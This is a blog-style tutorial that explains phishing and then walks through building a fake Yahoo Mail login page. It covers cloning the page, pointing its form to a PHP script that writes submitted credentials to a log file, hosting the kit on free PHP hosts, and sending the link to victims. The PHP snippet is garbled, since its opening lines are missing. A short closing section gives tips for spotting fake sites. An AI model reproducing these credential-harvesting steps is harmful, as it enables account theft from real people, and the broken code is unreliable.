PHISHING

Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication.
Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware. Phishing is typically carried out by e-mail spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.

Next in this tutorial I'll show how to Phish a website. In this tutorial I'll be using http://mail.yahoo.com then from there you will definately know how to phish any other website when you follow the tutorials correctly.

Step One: First of all choose ur target. So as every other tutorial on phishing we will start it by creating fake login page. To create fake login page open mail.yahoo.com from your web browser and save it on your desktop as “Web Page, Complete” with name Yahoomail Or you can visit the site's login page then write click on it and select "VIEW PAGE SOURCE" when it appears copy the whole html codes given and paste it in notepad then save it as yahoomail.htm. After the above process you’ll have a file named Yahoomail.htm and a folder named Yahoomail_files in folder in which you’ll save web page. Now open Yahoomail.htm in notepad, find for action word and locate following string,

action="https://login.yahoo.com/config/login?"

Once located change action string by phish.php, so that above string should appear as following,

action="phish.php"

Step two: Now step number two is to create phish.php file. So Open notepad and copy following code into it,

$value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Save it as phish.php

Step 3: Now create an empty password log file log.txt by opening notepad and don't write anything in the notepad page and save it as "log.txt".

Now sign up for a free webhosting service which supports php I'll suggest you use http://www.ripway.com. or www.byethost.com.com but i prefer http://www.byethost.com. Now upload Yahoomail.htm file, php file, password log file and Yahoomail_files folder to that web host. Change permission of log.txt file to777 from settings. Now vector this phished site to victim to get his/her password.

Tips on How to identify a fake website

Check Security Signs while doing any money transaction

You must always look for “https” on any site you use to enter sensitive information. This includes login pages, online shopping sites and bank web sites. Notice that, there is an extra “s” in bold which tells that the server is secure. e.g https://login.yahoo.com/config/login_verify2 for yahoo login.
Notice the closed padlock / lock on the lower right corner of the browser window. If you click on it, it will open a window that gives you more details regarding the certificate. Every company that asks you for sensitive information must have a digital certificate, preferably one from an established certificate authority.

Misspelled and fake URL Madness:-

Sometimes a site is replicated so well that you wont be able to find a difference if its really a fake one. You won’t be able to tell if a web site is a fake just by looking at the web design. These smart criminals can replicate any web site down to the last detail, and it wouldn’t surprise me if they used the same web designer to do it.

Take care of these things:-

Misspelled domains are big deceivers. Phishers will purchase a domain name that resembles the real domain. They will replace letters with numbers or with other letters. Pay close attention to the spelling of a domain names, and learn to spot a fake like www.yohoo.com or http://www.paypol.com/.
Variations of domains should also be a red flag. Don’t click on any email that contains URLs like http://center.yahoo-security.net. A legitimate URL should read if it actually belongs to Yahoo! Anyone could’ve purchased www.yahoo-security.net for a scam (I’m just using Yahoo! as an example here).
An IP address looks something like 102.199.60.250. Bottom line, never trust emails that point you to URLs that only show an IP address.

IF YOU HAVE ANY PROBLEM,YOU CAN COMMENT

NOTE: THIS TUTORIAL IS FOR EDUCATIONAL PURPOSE ONLY.

Thanks For Making This Possible! Kindly Bookmark and Share it.